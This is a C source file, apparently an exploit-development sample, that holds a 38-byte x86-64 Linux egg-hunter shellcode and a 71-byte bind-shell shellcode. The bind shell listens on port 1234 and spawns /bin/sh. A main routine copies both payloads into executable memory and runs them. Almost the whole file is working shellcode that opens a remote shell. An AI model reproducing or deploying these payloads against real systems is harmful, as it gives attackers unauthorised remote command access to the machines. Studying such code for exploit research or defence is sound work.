174 lines
No EOL
7.4 KiB
C
174 lines
No EOL
7.4 KiB
C
/**
|
|
Copyright © 2017 Odzhan. All Rights Reserved.
|
|
|
|
Redistribution and use in source and binary forms, with or without
|
|
modification, are permitted provided that the following conditions are
|
|
met:
|
|
|
|
1. Redistributions of source code must retain the above copyright
|
|
notice, this list of conditions and the following disclaimer.
|
|
|
|
2. Redistributions in binary form must reproduce the above copyright
|
|
notice, this list of conditions and the following disclaimer in the
|
|
documentation and/or other materials provided with the distribution.
|
|
|
|
3. The name of the author may not be used to endorse or promote products
|
|
derived from this software without specific prior written permission.
|
|
|
|
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
|
|
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
|
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
|
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
|
|
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
|
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
|
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
|
|
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
|
|
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
POSSIBILITY OF SUCH DAMAGE.
|
|
|
|
; 38 byte Egg Hunter using sys_access() for x86-64 Linux
|
|
;
|
|
bits 64
|
|
|
|
xor edi, edi ; rdi = 0
|
|
mul edi ; rax = 0, rdx = 0
|
|
xchg eax, esi ; rsi = F_OK
|
|
mov dh, 10h ; rdx = 4096
|
|
nxt_page:
|
|
add rdi, rdx ; advance 4096 bytes
|
|
nxt_addr:
|
|
push rdi ; save page address
|
|
add rdi, 8 ; try read 8 bytes ahead
|
|
push 21
|
|
pop rax ; rax = sys_access
|
|
syscall
|
|
pop rdi ; restore rdi
|
|
cmp al, 0xF2 ; -EFAULT means bad address
|
|
je nxt_page ; keep going until good read
|
|
|
|
; put your own signature here
|
|
mov eax, 0xDEADC0DE
|
|
scasd
|
|
jne nxt_addr
|
|
|
|
scasd
|
|
jne nxt_addr
|
|
|
|
jmp rdi ; jump into shellcode
|
|
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdint.h>
|
|
#include <stdlib.h>
|
|
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
#include <sys/mman.h>
|
|
|
|
#define EGG64_SIZE 38
|
|
|
|
char EGG64[] = {
|
|
/* 0000 */ "\x31\xff" /* xor edi, edi */
|
|
/* 0002 */ "\xf7\xe7" /* mul edi */
|
|
/* 0004 */ "\x96" /* xchg esi, eax */
|
|
/* 0005 */ "\xb6\x10" /* mov dh, 0x10 */
|
|
/* 0007 */ "\x48\x01\xd7" /* add rdi, rdx */
|
|
/* 000A */ "\x57" /* push rdi */
|
|
/* 000B */ "\x48\x83\xc7\x08" /* add rdi, 0x8 */
|
|
/* 000F */ "\x6a\x15" /* push 0x15 */
|
|
/* 0011 */ "\x58" /* pop rax */
|
|
/* 0012 */ "\x0f\x05" /* syscall */
|
|
/* 0014 */ "\x5f" /* pop rdi */
|
|
/* 0015 */ "\x3c\xf2" /* cmp al, 0xf2 */
|
|
/* 0017 */ "\x74\xee" /* jz 0x7 */
|
|
/* 0019 */ "\xb8\xde\xc0\xad\xde" /* mov eax, 0xdeadc0de */
|
|
/* 001E */ "\xaf" /* scasd */
|
|
/* 001F */ "\x75\xe9" /* jnz 0xa */
|
|
/* 0021 */ "\xaf" /* scasd */
|
|
/* 0022 */ "\x75\xe6" /* jnz 0xa */
|
|
/* 0024 */ "\xff\xe7" /* jmp rdi */
|
|
};
|
|
|
|
// sig is 0xDEADC0DE
|
|
#define EGG_SIG "\xDE\xC0\xAD\xDE"
|
|
|
|
// 71 byte bind shell for x86-64 Linux.
|
|
// listens on 0.0.0.0:1234
|
|
//
|
|
// port offset is 0x010
|
|
//
|
|
char BS[] = {
|
|
EGG_SIG
|
|
EGG_SIG
|
|
/* 0000 */ "\x6a\x29" /* push 0x29 */
|
|
/* 0002 */ "\x58" /* pop rax */
|
|
/* 0003 */ "\x6a\x01" /* push 0x1 */
|
|
/* 0005 */ "\x5e" /* pop rsi */
|
|
/* 0006 */ "\x6a\x02" /* push 0x2 */
|
|
/* 0008 */ "\x5f" /* pop rdi */
|
|
/* 0009 */ "\x99" /* cdq */
|
|
/* 000A */ "\x0f\x05" /* syscall */
|
|
/* 000C */ "\x97" /* xchg edi, eax */
|
|
/* 000D */ "\xbb\x02\xff\x04\xd2" /* mov ebx, 0xd204ff02 */
|
|
/* 0012 */ "\xfe\xc7" /* inc bh */
|
|
/* 0014 */ "\x53" /* push rbx */
|
|
/* 0015 */ "\x54" /* push rsp */
|
|
/* 0016 */ "\x5e" /* pop rsi */
|
|
/* 0017 */ "\xb2\x10" /* mov dl, 0x10 */
|
|
/* 0019 */ "\xb0\x31" /* mov al, 0x31 */
|
|
/* 001B */ "\x0f\x05" /* syscall */
|
|
/* 001D */ "\x31\xf6" /* xor esi, esi */
|
|
/* 001F */ "\xb0\x32" /* mov al, 0x32 */
|
|
/* 0021 */ "\x0f\x05" /* syscall */
|
|
/* 0023 */ "\xb0\x2b" /* mov al, 0x2b */
|
|
/* 0025 */ "\x0f\x05" /* syscall */
|
|
/* 0027 */ "\x97" /* xchg edi, eax */
|
|
/* 0028 */ "\x96" /* xchg esi, eax */
|
|
/* 0029 */ "\xb0\x21" /* mov al, 0x21 */
|
|
/* 002B */ "\x0f\x05" /* syscall */
|
|
/* 002D */ "\x83\xee\x01" /* sub esi, 0x1 */
|
|
/* 0030 */ "\x79\xf7" /* jns 0x29 */
|
|
/* 0032 */ "\x31\xf6" /* xor esi, esi */
|
|
/* 0034 */ "\x50" /* push rax */
|
|
/* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rcx, 0x68732f2f6e69622f */
|
|
/* 003F */ "\x51" /* push rcx */
|
|
/* 0040 */ "\x54" /* push rsp */
|
|
/* 0041 */ "\x5f" /* pop rdi */
|
|
/* 0042 */ "\x99" /* cdq */
|
|
/* 0043 */ "\xb0\x3b" /* mov al, 0x3b */
|
|
/* 0045 */ "\x0f\x05" /* syscall */
|
|
};
|
|
|
|
void xcode(char *s, int len)
|
|
{
|
|
uint8_t *p;
|
|
|
|
p=(uint8_t*)mmap (0, len,
|
|
PROT_EXEC | PROT_WRITE | PROT_READ,
|
|
MAP_ANON | MAP_PRIVATE, -1, 0);
|
|
|
|
memcpy(p, s, len);
|
|
|
|
// execute
|
|
((void(*)())p)();
|
|
|
|
munmap ((void*)p, len);
|
|
}
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS),
|
|
PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
|
|
|
|
if (sc != NULL) {
|
|
memcpy (sc, BS, sizeof(BS));
|
|
xcode (EGG64, EGG64_SIZE);
|
|
munmap((void*)sc, sizeof(BS));
|
|
}
|
|
return 0;
|
|
} |